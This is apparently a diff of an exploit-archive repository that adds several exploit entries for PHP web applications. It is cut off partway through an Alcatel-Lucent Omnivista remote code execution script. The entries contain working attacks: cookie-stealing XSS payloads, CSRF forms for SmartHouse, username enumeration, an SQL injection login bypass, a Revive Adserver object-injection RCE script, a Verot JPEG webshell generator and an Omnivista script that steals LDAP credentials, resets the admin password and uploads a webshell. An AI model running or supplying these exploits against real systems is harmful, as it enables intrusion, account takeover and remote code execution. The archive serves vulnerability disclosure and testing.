+"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>"
+
+# POC: http://localhost/inventory/admin/pageViewGroups.php in this
+# url you can edit the groups information with pressing onto the group name. After the edit page open
+# you can enter your payload into the description field. After going back to
+# the groups page you will see your Javascript code gonna run.
+# This vulnerability is also exist while you are creating a new group.
\ No newline at end of file
diff --git a/exploits/php/webapps/47730.txt b/exploits/php/webapps/47730.txt
new file mode 100644
index 000000000..d15cf08e8
--- /dev/null
+++ b/exploits/php/webapps/47730.txt
@@ -0,0 +1,123 @@
+# Exploit Title: SmartHouse Webapp 6.5.33 - Cross-Site Request Forgery
+# Discovery by: LiquidWorm
+# Date: 2019-12-02
+# Vendor Homepage: 
+# Tested Version: 6.5.33.17072501
+# CVE: N/A
+# Advisory ID: ZSL-2019-5543
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5543.php
+
+Carlo Gavazzi SmartHouse Webapp 6.5.33 CSRF/XSS Vulnerabilities
+
+
+Vendor: Carlo Gavazzi Automation S.p.A
+Product web page: http://www.gavazzi-automation.com | http://www.smarthouse.nu
+Affected version: Web-app: 6.5.33.17072501
+                  Web-app: 6.5.32.17062101
+                  Web-app: 6.2.3.16102701
+                  Web-app: 5.5.3.160421101
+                  Web-app: 5.3.3.15120101
+                  Release: 1.0.5.1
+                  Release: 1.0.5.0
+                  Release: 1.0.3.5
+                  Release: 1.0.3.2
+
+Summary: Carlo Gavazzi is an international company that develops, manufactures
+and sells electrical automation components. Our products are used in industrial
+automation and real estate automation. Smart-house is based on a system that we
+have developed and produced since 1986, mainly for industrial-related installations.
+Our system is present in more than 150,000 installations. For a few years now, we
+have focused our development on smart electrical installations for home and property
+automation. Smart-house is currently installed in both villas and commercial properties.
+
+Desc: The application suffers from multiple CSRF and XSS vulnerabilities. The application
+allows users to perform certain actions via HTTP requests without performing any validity
+checks to verify the requests. This can be exploited to perform certain actions with
+administrative privileges if a logged-in user visits a malicious web site. Input passed
+to several GET/POST parameters is not properly sanitised before being returned to the user.
+This can be exploited to execute arbitrary HTML and script code in a user's browser session
+in context of an affected site.
+
+Tested on: Apache
+           PHP
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2019-5543
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5543.php
+
+
+01.11.2019
+
+--
+
+
+Reflected XSS (GET):
+--------------------
+
+1. http://192.168.0.24/app/index.php?error=Waddup"><script>confirm(document.cookie)</script> (pre-auth)
+2. http://192.168.0.24/app/messagepage.php?msg=<script>confirm(document.cookie)</script> (pre-auth)
+3. http://192.168.0.24/app/detaf.php?p=0&l=50"><script>confirm(document.cookie)</script>&f=5658 (post-auth)
+4. http://192.168.0.24/app/detaf.php?p=0"><script>confirm(document.cookie)</script>&l=50&f=5658 (post-auth)
+5. http://192.168.0.24/?functionsh=list&part[]=fn__intrudermain001&part[]=fn__intrudersec002&name=IntruderMainFunction"><script>confirm(document.cookie)</script>&grpl=1 (post-auth)
+
+
+CSRF set temperature:
+---------------------
+
+<html>
+  <body>
+    <form action="http://192.168.0.24/app/datasend.php" method="POST">
+      <input type="hidden" name="IDFunction" value="3875" />
+      <input type="hidden" name="favorite" value="0" />
+      <input type="hidden" name="rooms" value="-1" />
+      <input type="hidden" name="userId" value="-300" />
+      <input type="hidden" name="heat_ensave_set" value="24" />
+      <input type="hidden" name="heat_set" value="25.5" />
+      <input type="submit" value="Set" />
+    </form>
+  </body>
+</html>
+
+
+Stored XSS (POST):
+------------------
+
+<html>
+  <body>
+    <form action="http://192.168.0.24/app/command.php" method="POST">
+      <input type="hidden" name="op" value="11" />
+      <input type="hidden" name="name" value='Graph name"><script>confirm(document.cookie)</script>' />
+      <input type="hidden" name="period" value="2" />
+      <input type="hidden" name="gg" value="6" />
+      <input type="hidden" name="ggf" value="6" />
+      <input type="hidden" name="mm" value="11" />
+      <input type="hidden" name="mmf" value="11" />
+      <input type="hidden" name="aa" value="2019" />
+      <input type="hidden" name="aaf" value="2019" />
+      <input type="hidden" name="param" value="[1]" />
+      <input type="submit" value="Send" />
+    </form>
+  </body>
+</html>
+
+
+Reflected XSS (POST):
+---------------------
+
+<html>
+  <body>
+    <form action="http://192.168.0.24/refresh.php">
+      <input type="hidden" name="param[0][]" value="switch0251<script>confirm(document.cookie)</script>" />
+      <input type="hidden" name="param[0][]" value="0251" />
+      <input type="hidden" name="param[0][]" value="switch" />
+      <input type="hidden" name="param[1][]" value="switch1250" />
+      <input type="hidden" name="param[1][]" value="1250" />
+      <input type="hidden" name="param[1][]" value="switch" />
+      <input type="submit" value="Send" />
+    </form>
+  </body>
+</html>
\ No newline at end of file
diff --git a/exploits/php/webapps/47731.txt b/exploits/php/webapps/47731.txt
new file mode 100644
index 000000000..e78a79dc7
--- /dev/null
+++ b/exploits/php/webapps/47731.txt
@@ -0,0 +1,37 @@
+# Exploit Title: Dokuwiki 2018-04-22b - Username Enumeration
+# Date: 2019-12-01
+# Exploit Author: Talha ŞEN
+# Vendor Homepage: https://www.dokuwiki.org/dokuwiki
+# Software Link: https://download.dokuwiki.org/
+# Version: 2018-04-22b "Greebo"
+# Tested on: 
+# Alpine Linux 3.5 (docker image)
+# PHP 5.6.30
+# Apache/2.4.25 (Unix)
+# CVE : 
+
+# At login page there is a "set new password" page as below:
+# Forgotten your password? Get a new one: Set new password
+# At this page there is username enumeration vulnerability.
+# Testing for non-valid user:
+
+POST /doku.php?id=start&do=resendpwd HTTP/1.1
+
+sectok=&do=resendpwd&save=1&login=sss
+
+# Response for non-valid user(sss):
+
+<div class="error">Sorry, we can't find this user in our database.</div>
+
+========================================================================
+
+# Testing for valid user:
+
+POST /doku.php?id=start&do=resendpwd HTTP/1.1
+
+sectok=&do=resendpwd&save=1&login=admin
+
+# Response for valid user (admin):
+
+<div class="error">There was an unexpected problem communicating with SMTP: Could not open SMTP Port.</div>
+<div class="error">Looks like there was an error on sending the password mail. Please contact the admin!</div>
\ No newline at end of file
diff --git a/exploits/php/webapps/47737.txt b/exploits/php/webapps/47737.txt
new file mode 100644
index 000000000..8aefee2a3
--- /dev/null
+++ b/exploits/php/webapps/47737.txt
@@ -0,0 +1,30 @@
+# Exploit Title: Online Invoicing System 2.6 - 'description' Persistent Cross-Site Scripting
+# Date: 2019-11-29
+# Exploit Author: Cemal Cihad ÇİFTÇİ
+# Vendor Homepage: https://bigprof.com
+# Software Download Link : https://github.com/bigprof-software/online-invoicing-system
+# Software : Online Invoicing System
+# Version : 2.6
+# Vulernability Type : Cross-site Scripting
+# Vulenrability : Stored XSS
+
+# Stored XSS has been discovered in the Online Invoicing System created by bigprof/AppGini
+# editmembers section. Description parameter affected from this vulnerability.
+# payload: <script>alert(123);</script>
+
+# HTTP POST request
+POST /inovicing/app/admin/pageEditGroup.php HTTP/1.1
+Host: 10.10.10.160
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 464
+Origin: http://10.10.10.160
+Connection: close
+Referer: http://10.10.10.160/inovicing/app/admin/pageEditGroup.php?groupID=2
+Cookie: inventory=4eg101l42apiuvutr7vguma5ar; online_inovicing_system=vl8ml5or8sgdee9ep9lnhglk69
+Upgrade-Insecure-Requests: 1
+
+groupID=2&name=Admins&description=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E&visitorSignup=0&invoices_insert=1&invoices_view=3&invoices_edit=3&invoices_delete=3&clients_insert=1&clients_view=3&clients_edit=3&clients_delete=3&item_prices_insert=1&item_prices_view=3&item_prices_edit=3&item_prices_delete=3&invoice_items_insert=1&invoice_items_view=3&invoice_items_edit=3&invoice_items_delete=3&items_insert=1&items_view=3&items_edit=3&items_delete=3&saveChanges=1
\ No newline at end of file
diff --git a/exploits/php/webapps/47739.php b/exploits/php/webapps/47739.php
new file mode 100644
index 000000000..eb875ddde
--- /dev/null
+++ b/exploits/php/webapps/47739.php
@@ -0,0 +1,155 @@
+# Exploit Title: Revive Adserver 4.2 - Remote Code Execution
+# Google Dork: "inurl:www/delivery filetype:php"
+# Exploit Author: crlf
+# Vendor Homepage: https://www.revive-adserver.com/
+# Software Link: https://www.revive-adserver.com/download/archive/
+# Version: 4.1.x <= 4.2 RC1
+# Tested on: *nix
+# CVE : CVE-2019-5434
+# Сontains syntax error for protection against skids
+
+
+<?php
+# Revive Adserver 4.1.x <= 4.2 RC1 PHP Object Injection to Remote Code Execution (CVE-2019-5434)
+# coded by @crlf, with love for antichat.com
+# special thanks to @Kaimi :)
+# the script should be used only for educational purposes!
+
+namespace{
+  (!isset($argv[2]) ? exit(message('php '.basename(__FILE__).' https://example.com/adserver-dir/ \'<?php phpinfo(); ?>\'')) : @list($x, $url, $code) = $argv);
+
+  $source = 'data:text/html;base64,'.base64_encode('#');
+  $destination = 'plugins/.htaccess';
+  #$destination = 'var/.htaccess';
+
+  if(!strpos(request($url, $source, $destination), 'methodResponse')) exit(message('failed, no valid response from '.$url));
+
+  $source = 'data:text/html;base64,'.base64_encode($code);
+  $destination = 'plugins/3rdPartyServers/ox3rdPartyServers/doubleclick.class.php';
+  #$destination = 'var/default.conf.php';
+
+  request($url, $source, $destination);
+  message('check '.$url.$destination);
+
+  function request($url, $source, $destination){
+
+    $what = serialize(
+         ['what' =>
+            new Pdp\Uri\Url(
+                new League\Flysystem\File( $destination,
+                    new League\Flysystem\File( 'x://'.$source,
+                        new League\Flysystem\MountManager(
+                            new League\Flysystem\Filesystem(
+                                new League\Flysystem\Config,
+                                new League\Flysystem\Adapter\Local('')
+                            ),
+                            new League\Flysystem\Plugin\ForcedCopy
+                        )
+                    )
+                )
+            )
+         ]
+     );
+
+    $what = str_replace(['\Uri\Url\00'],['\5CUri\5CUrl\00'], str_replace(['s:', сhr(0)],['S:', '\\00'], $what));
+
+    $xml = '<?xml version="1.0" encoding="ISO-8859-1"?>
+              <methodCall>
+               <methodName>openads.spc</methodName>
+               <params>
+                 <param>
+                   <value>
+                     <struct>
+                       <member>
+                         <name>remote_addr</name>
+                         <value>8.8.8.8</value>
+                       </member>
+                       <member>
+                         <name>cookies</name>
+                         <value>
+                           <array>
+                           </array>
+                         </value>
+                       </member>
+                     </struct>
+                   </value>
+                 </param>
+                 <param><value><string>'.$what.'</string></value></param>
+                 <param><value><string>0</string></value></param>
+                 <param><value><string>dsad</string></value></param>
+                 <param><value><boolean>1</boolean></value></param>
+                 <param><value><boolean>0</boolean></value></param>
+                 <param><value><boolean>1</boolean></value></param>
+               </params>
+             </methodCall>';
+
+    return file_get_contents($url.'adxmlrpc.php', false, stream_context_create(
+                             ['http' =>
+                               ['method' => 'POST',
+                                'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0',
+                                'header' =>'Content-type: application/x-www-form-urlencoded',
+                                'content'=> $xml
+                                ]
+                             ])
+           );
+  }
+
+  function message($str){
+     print PHP_EOL.'### '.$str.' ###'.PHP_EOL.PHP_EOL;
+  }
+}
+
+namespace League\Flysystem\Plugin{
+  class ForcedCopy{}
+}
+
+namespace League\Flysystem{
+  class Config{
+    protected $settings = [];
+    public function __construct(){
+       $this->settings = ['disable_asserts' => true];
+    }
+  }
+  class Filesystem{
+    protected $adapter;
+    protected $config;
+     public function __construct($config,$adapter){
+       $this->config = $config;
+       $this->adapter = $adapter;
+     }
+  }
+  class MountManager{
+    protected $filesystems = [];
+    protected $plugins = [];
+     public function __construct($filesystem, $handler){
+       $this->filesystems = ['x' => $filesystem];
+       $this->plugins = ['__toString' => $handler];
+     }
+  }
+  class File{
+    protected $path;
+    protected $filesystem;
+    public function __construct($path, $obj){
+      $this->filesystem = $obj;
+      $this->path = $path;
+    }
+  }
+}
+
+namespace League\Flysystem\Adapter{
+  class Local{
+    protected $pathPrefix;
+    public function __construct($prefix){
+       $this->pathPrefix = $prefix;
+     }
+  }
+}
+
+namespace Pdp\Uri{
+  class Url{
+    private $host;
+    public function __construct($file){
+      $this->host = $file;
+    }
+  }
+}
\ No newline at end of file
diff --git a/exploits/php/webapps/47741.txt b/exploits/php/webapps/47741.txt
new file mode 100644
index 000000000..8e9720a62
--- /dev/null
+++ b/exploits/php/webapps/47741.txt
@@ -0,0 +1,84 @@
+# Exploit Title: Online Clinic Management System 2.2 - HTML Injection
+# Date: 2019-11-29
+# Exploit Author: Cemal Cihad ÇİFTÇİ
+# Vendor Homepage: https://bigprof.com
+# Software Download Link : https://bigprof.com/appgini/applications/online-clinic-management-system
+# Software : Online Clinic Management System
+# Version : 2.2
+# Vulernability Type : HTML Injection
+# Vulenrability : HTM Injection
+
+# HTML Injection has been discovered in the Online Clinic Management System created by bigprof/AppGini
+# add disase symptom, patient and appointment section.
+# payload: <b><i>asd</i></b>
+
+# HTTP POST request
+
+POST /inovicing/app/admin/pageEditGroup.php HTTP/1.1
+Host: 10.10.10.160
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
+POST /clinic/disease_symptoms_view.php HTTP/1.1
+Host: 10.10.10.160
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------325041947016922
+Content-Length: 1501
+Origin: http://10.10.10.160
+Connection: close
+Referer: http://10.10.10.160/clinic/disease_symptoms_view.php
+Cookie: inventory=4eg101l42apiuvutr7vguma5ar; online_inovicing_system=vl8ml5or8sgdee9ep9lnhglk69; online_clinic_management_system=e3fqbalmcu4o9d4tvuuakpn9e8
+Upgrade-Insecure-Requests: 1
+
+ -----------------------------325041947016922
+Content-Disposition: form-data; name="current_view"
+
+ DV
+-----------------------------325041947016922
+
+Content-Disposition: form-data; name="SortField"
+-----------------------------325041947016922
+Content-Disposition: form-data; name="SelectedID"
+
+1
+-----------------------------325041947016922
+Content-Disposition: form-data; name="SelectedField"
+
+-----------------------------325041947016922
+Content-Disposition: form-data; name="SortDirection"
+
+-----------------------------325041947016922
+Content-Disposition: form-data; name="FirstRecord"
+
+1
+-----------------------------325041947016922
+Content-Disposition: form-data; name="NoDV"
+
+-----------------------------325041947016922
+Content-Disposition: form-data; name="PrintDV"
+
+-----------------------------325041947016922
+Content-Disposition: form-data; name="DisplayRecords" 
+
+all
+-----------------------------325041947016922
+Content-Disposition: form-data; name="disease"
+
+<b><i>asd</i></b>
+
+-----------------------------325041947016922
+Content-Disposition: form-data; name="symptoms"
+
+<b><i>asd</i></b>
+
+-----------------------------325041947016922
+Content-Disposition: form-data; name="reference"
+
+-----------------------------325041947016922
+Content-Disposition: form-data; name="update_x"
+
+1
+-----------------------------325041947016922
+Content-Disposition: form-data; name="SearchString"
+-----------------------------325041947016922--
\ No newline at end of file
diff --git a/exploits/php/webapps/47745.txt b/exploits/php/webapps/47745.txt
new file mode 100644
index 000000000..e9e0e5536
--- /dev/null
+++ b/exploits/php/webapps/47745.txt
@@ -0,0 +1,40 @@
+# Exploit Title: OwnCloud 8.1.8 - Username Disclosure
+# Exploit Author : Daniel Moreno
+# Exploit Date: 2019-11-29
+# Vendor Homepage :  https://owncloud.org/  
+# Link Software :  https://ftp.icm.edu.pl/packages/owncloud/  (old version. Download at your own risk) 
+# Tested on OS: CentOS
+
+# PoC:
+# 1. Create an account in OwnCloud
+# 2. Intercept connection with Burp
+# 3. Share a file, typing anything
+
+---------------------------------------------------------
+4. Burp will capture this request
+
+GET /index.php/core/ajax/share.php?fetch=getShareWith&*search=bla*&limit=200&itemType=file
+HTTP/1.1
+Host: XXXXXXXXXXXXX
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0)
+Gecko/20100101 Firefox/70.0
+Accept: */*
+Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+requesttoken: XXXXXXXXXXXXXXXXXXX
+OCS-APIREQUEST: true
+X-Requested-With: XMLHttpRequest
+Connection: close
+Referer: https://domain.com/index.php/apps/files/
+Cookie: XXXXXXXXXXXXXXXX
+---------------------------------------------------------------------
+
+5. Send to Repeater
+
+6. Change GET parameter to THIS:
+
+GET /index.php/core/ajax/share.php?fetch=getShareWith&*search=*&limit=200&itemType=file
+HTTP/1.1
+
+
+7. Return valeus will be a JSON with all username informations
\ No newline at end of file
diff --git a/exploits/php/webapps/47749.php b/exploits/php/webapps/47749.php
new file mode 100644
index 000000000..c6ad8af85
--- /dev/null
+++ b/exploits/php/webapps/47749.php
@@ -0,0 +1,130 @@
+# Exploit Title: Verot 2.0.3 - Remote Code Execution
+# Date: 2019-12-05
+# Exploit Author: Jinny Ramsmark
+# Vendor Homepage: https://www.verot.net/php_class_upload.htm
+# Software Link: https://github.com/verot/class.upload.php
+# Version: <=2.0.3
+# Tested on: Ubuntu 19.10, PHP 7.3, Apache/2.4.41
+# CVE : CVE-2019-19576
+
+<?php
+#Title: jpeg payload generator for file upload RCE
+#Author: Jinny Ramsmark
+#Github: https://github.com/jra89/CVE-2019-19576
+#Other: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19576
+#Usage: php inject.php
+#Output: image.jpg.phar is the file to be used for upload and exploitation
+
+#This script assumes no special transforming is done on the image for this specific CVE.
+#It can be modified however for different sizes and so on (x,y vars).
+
+ini_set('display_errors', 1);
+error_reporting(E_PARSE);
+#requires php, php-gd
+ 
+$orig = 'image.jpg';
+$code = '<?=exec($_GET["c"])?>';
+$quality = "85";
+$base_url = "http://lorempixel.com";
+ 
+echo "-=Imagejpeg injector 1.7=-\n";
+ 
+do
+{
+    $x = 100;
+    $y = 100;
+    $url = $base_url . "/$x/$y/";
+ 
+    echo "[+] Fetching image ($x X $y) from $url\n";
+    file_put_contents($orig, file_get_contents($url));
+} while(!tryInject($orig, $code, $quality));
+ 
+echo "[+] It seems like it worked!\n";
+echo "[+] Result file: image.jpg.phar\n";
+ 
+function tryInject($orig, $code, $quality)
+{
+    $result_file = 'image.jpg.phar';
+    $tmp_filename = $orig . '_mod2.jpg';
+    
+    //Create base image and load its data
+    $src = imagecreatefromjpeg($orig);
+
+    imagejpeg($src, $tmp_filename, $quality);
+    $data = file_get_contents($tmp_filename);
+    $tmpData = array();
+
+    echo "[+] Jumping to end byte\n";
+    $start_byte = findStart($data);
+ 
+    echo "[+] Searching for valid injection point\n";
+    for($i = strlen($data)-1; $i > $start_byte; --$i)
+    {
+        $tmpData = $data;
+        for($n = $i, $z = (strlen($code)-1); $z >= 0; --$z, --$n)
+        {
+            $tmpData[$n] = $code[$z];
+        }
+ 
+        $src = imagecreatefromstring($tmpData);
+        imagejpeg($src, $result_file, $quality);
+ 
+        if(checkCodeInFile($result_file, $code))
+        {
+            unlink($tmp_filename);
+            unlink($result_file);
+            sleep(1);
+ 
+            file_put_contents($result_file, $tmpData);
+            echo "[!] Temp solution, if you get a 'recoverable parse error' here, it means it probably failed\n";
+ 
+            sleep(1);
+            $src = imagecreatefromjpeg($result_file);
+ 
+            return true;
+        }
+        else
+        {
+            unlink($result_file);
+        }
+    }
+        unlink($orig);
+        unlink($tmp_filename);
+        return false;
+}
+ 
+function findStart($str)
+{
+    for($i = 0; $i < strlen($str); ++$i)
+    {
+        if(ord($str[$i]) == 0xFF && ord($str[$i+1]) == 0xDA)
+        {
+            return $i+2;
+        }
+    }
+ 
+    return -1;
+}
+ 
+function checkCodeInFile($file, $code)
+{
+    if(file_exists($file))
+    {
+        $contents = loadFile($file);
+    }
+    else
+    {
+        $contents = "0";
+    }
+ 
+    return strstr($contents, $code);
+}
+ 
+function loadFile($file)
+{
+    $handle = fopen($file, "r");
+    $buffer = fread($handle, filesize($file));
+    fclose($handle);
+ 
+    return $buffer;
+}
\ No newline at end of file
diff --git a/exploits/php/webapps/47756.txt b/exploits/php/webapps/47756.txt
new file mode 100644
index 000000000..7d105646b
--- /dev/null
+++ b/exploits/php/webapps/47756.txt
@@ -0,0 +1,52 @@
+# Exploit Title: Snipe-IT Open Source Asset Management 4.7.5 - Persistent Cross-Site Scripting
+# Exploit Author: Metin Yunus Kandemir (kandemir)
+# Vendor Homepage: https://snipeitapp.com/
+# Software Link: https://github.com/snipe/snipe-it/releases/tag/v4.7.5
+# Version: 4.7.5
+# Category: Webapps
+# Tested on: Xampp for Windows
+
+# Description:
+# Snipe-IT v4.7.5 has persistent cross-site scripting vulnerability via uploading svg file in accessories section.
+# A malicious authorized user could potentially upload an SVG with a javascript payload.
+
+#Steps to Reproduce:
+
+Upload crafted SVG file when sent request to create accessory.
+Click created accessory and copy uploaded file location.
+Browse uploaded SVG file location on browser.
+The alert box will be opened.
+
+#(PoC) Post Request:
+
+POST /accessories HTTP/1.1
+Host: target
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://target/accessories/create
+Content-Type: multipart/form-data; boundary=---------------------------6547029722068941066578895105
+Content-Length: 1761
+Cookie: XSRF-TOKEN=eyJpdiI6Ikh1TURMRnpyVDJsaVh4WUI5MWtQWnc9PSIsInZhbHVlIjoiUUNOcVErbFpcL0hGbmVveU9wYzZlOWRrVXNBbWxqeDBQZ3drbW4yZ2RXWU1POGlQQnVOeG5EcThxaUUraGdSYmlCMmNIc2VMMERxYnJOWDRBRUhmdEx3PT0iLCJtYWMiOiI2ZTg5YTA2MmUxZWRmM2RjYTNmNzI4YTE0YTQyOTQ4MGEzMDYyYWJiMDk5NGYwOWE4M2Y4ZTc4MWMxYzJhOGY1In0%3D; snipeitv4_session=KvsAzbhBKlUwbijPmLc86vCgO0PhG67J6EIIR0MD; laravel_token=eyJpdiI6InRTXC83Qmx0aDdVTE9EbVJzSnJ4V01nPT0iLCJ2YWx1ZSI6InVITklNQ3h3WldXMFIzY01Ob0Zqb1wvdm1NQTZXN3JuXC9Nc0g5Z0lpWXZCaTdiVHFOUVB4ZkpmQWRrVk1ZWVZFN1dZVnRrM3pRdjRCcWxySDRtd3hEWlIxd0h5QThUMDAyaVJcL0YzTmhFMlVlNzVFSG95S2VVYVBiRzNzNUtIOTkwdlBWUmQ1K3dTZHNNeXZJWVNmaWczb2hyOGFWRmI1a1NiNk84a1wvOW1tWXpleTMzSnRwYlowenBHSzN4dHRzd2lUTXd1b1dLNkluMEt2bWE0M1J4UTBaNGMzTGFQWEVOWnNyQk1aQk1nQ0tBejVjUU9XRnc5Q0l0citqSnJlbzgwTEVWQlN5ekdZa2hYckQ5T1ZKc2E2UT09IiwibWFjIjoiZDZhNWE2NjFmOTMwOWI0N2E2NjE3YTQwNWFlYjg0MmMyYTkwYzE1YTc4ZWI3N2U1ZWFjNGIyMzM4ZWU2NjczMyJ9
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+.
+..
+snip
+..
+.
+
+Content-Disposition: form-data; name="image"; filename="test.svg"
+Content-Type: image/svg+xml
+
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
+<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
+<script type="text/javascript">
+alert(1);
+</script>
+</svg>
+
+-----------------------------6547029722068941066578895105--
\ No newline at end of file
diff --git a/exploits/php/webapps/47758.txt b/exploits/php/webapps/47758.txt
new file mode 100644
index 000000000..cafbce675
--- /dev/null
+++ b/exploits/php/webapps/47758.txt
@@ -0,0 +1,13 @@
+# Exploit Title: PRO-7070 Hazır Profesyonel Web Sitesi 1.0 - Authentication Bypass
+# Date: 2019-12-08
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: https://www.websitem.biz/hazir-site/pro-7070-hazir-mobil-tablet-uyumlu-web-sitesi
+# Tested on: Kali Linux
+# Version: 1.0
+# CVE: N/A
+
+----- PoC: Authentication Bypass -----
+
+Administration Panel: http://localhost/[PATH]/yonetim/pass.asp
+Username: '=' 'or'
+Password: '=' 'or'
\ No newline at end of file
diff --git a/exploits/php/webapps/47761.py b/exploits/php/webapps/47761.py
new file mode 100755
index 000000000..6cd8f9fbd
--- /dev/null
+++ b/exploits/php/webapps/47761.py
@@ -0,0 +1,176 @@
+# Exploit Title: Alcatel-Lucent Omnivista 8770 - Remote Code Execution
+# Google Dork: inurl:php-bin/webclient.php
+# Date: 2019-12-01
+# Author: 0x1911
+# Vendor Homepage: https://www.al-enterprise.com/
+# Software Link: https://www.al-enterprise.com/en/products/communications-management-security/omnivista-8770-network-management-system
+# Version: All versions, still unpatched
+# Tested on: Windows 2003/2008
+# CVE : 0day
+
+# Exploit attached, also available here https://git.lsd.cat/g/omnivista-rce/src/master/omnivista.py
+# Full writeup at https://git.lsd.cat/g/omnivista-rce/src/master/README.md
+
+
+'''
+Original url: https://git.lsd.cat/g/omnivista-rce
+Website: https://lsd.cat
+'''
+import requests
+import socket
+import ldap
+import sys
+from urllib.parse import urlparse
+from urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
+
+class OmniVista:
+	def __init__(self, host):
+		self.host = host
+		self.addr = (urlparse(self.host).hostname)
+		self.folders = ['php-bin/', 'soap-bin/', 'bin/', 'data/', 'Themes/', 'log/']
+		self.filename = "poc.php"
+		self.webshell = "<?php system($_REQUEST[0]) ?>"
+
+	def identify(self):
+		r = requests.get(self.host + 'php-bin/Webclient.php', verify=False)
+		if '8770' in r.text:
+			return 8770
+		elif '4760' in r.text:
+			return 4760
+		else:
+			return False
+
+	def checkldap(self):
+		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+		s.settimeout(10)
+		result = s.connect_ex((self.addr, 389))
+		if result == 0:
+			return True
+
+	def info(self):
+		r = requests.post(self.host + 'php-bin/info.php', data={"void": "phDPhd"}, verify=False)
+		if 'PHP Version' in r.text:
+			return r.text
+		else:
+			return False
+
+	def getpassword(self):
+		r = requests.get(self.host + 'php-bin/Webclient.php', verify=False)
+		id = r.headers['Set-Cookie'].split(";")[0].split("=")[1]
+		r = requests.get(self.host + 'sessions/sess_' + id, verify=False)
+		lenght = int(r.text.split("ldapSuPass")[1][3:5])
+		password = r.text.split("ldapSuPass")[1][7:7+lenght]
+		return password
+
+	def decodepassword(self, password):
+		counter = 0
+		key = 16
+		cleartext = ""
+		if password[0:5] == "{NMC}":
+			password = password[5:]
+		else:
+			return False
+		for char in password:
+			if 32 <= ord(char):
+				char = chr(ord(char) ^ key)
+				cleartext += char
+			else:
+				cleartext += char
+			if ord(char) != 0:
+				key = counter * ord(char) % 255 >> 3
+			else:
+				key = 16
+			counter += 1
+		return cleartext
+
+	def connectldap(self):
+		connect = ldap.initialize('ldap://' + self.addr)
+		connect.set_option(ldap.OPT_REFERRALS, 0)
+		connect.simple_bind_s(self.username, self.password)
+		result = connect.search_s('o=nmc', ldap.SCOPE_SUBTREE, '(cn=AdminNmc)')
+		print('[*] Current AdminNmc password: ' + str(result[0][1]['userpassword'][0]))
+		self.bind = connect
+		return True
+
+	def editadminpassword(self):
+		self.adminusername = "AdminNmc"
+		self.adminpassword = "Lsdcat_exploit1!"
+		self.bind.modify_s("uid=AdminNmc,cn=Administrators,cn=8770 administration,o=nmc", [(ldap.MOD_REPLACE, 'userpassword', self.adminpassword.encode('utf-8') )])
+		return True
+
+	def login(self):
+		self.session = requests.session()
+		r = self.session.post(self.host + 'php-bin/webclient.php', data = {"action": "loginCheck", "userLogin": self.adminusername, "userPass": self.adminpassword }, verify = False)
+		if 'Directory license is required!' in r.text:
+			return False
+		else:
+			return True
+
+	def exploit8770(self):
+		r = self.session.get(self.host + 'php-bin/webclient.php', params = {'action': 'editTheme', 'themeId': "2"}, verify=False)
+		r = self.session.post(self.host + 'php-bin/webclient.php',
+			data = {"action": "saveTheme", "themeId": "2"},
+			files = { "BgImg1": (self.filename, self.webshell, "image/png")},
+			verify = False)
+		if 'success' in r.text:
+			return True
+
+	def exec8770(self):
+		return requests.post(self.host + 'Theme2/' + 'poc.php', data = {"0": cmd}, verify=False).text
+
+	def exploit4760(self):
+		for folder in self.folders:
+			r = requests.post(self.host + 'php-bin/webclient.php',
+				data = {"action": "saveTheme", "themeId": "5/../../{}".format(folder), "themeDate": ""},
+				files = { "BgImg1": (self.filename, self.webshell, "image/png")},
+			verify=False)
+			if 'success' in r.text:
+				self.folder = folder
+				return True
+
+	def exec4760(self, cmd):
+		return requests.post(self.host + self.folder + 'poc.php', data = {"0": cmd}, verify=False).text
+
+	def autoexploit(self):
+		print('[*] Attempting to exploit on {}'.format(self.host))
+		self.model = self.identify()
+		if self.model == 4760:
+			print('[*] Model is {}'.format(str(self.model)))
+			self.exploit4760()
+			print('[*] Upload folder is {}'.format(self.folder))
+			output = self.exec4760("whoami")
+			print('[*] Webshell at {}{}{}'.format(self.host, self.folder, self.filename))
+			print('[*] Command output: '.format(output))
+		elif self.model == 8770:
+			print('[*] Model is {}'.format(str(self.model)))
+			self.username = "cn=Directory Manager"
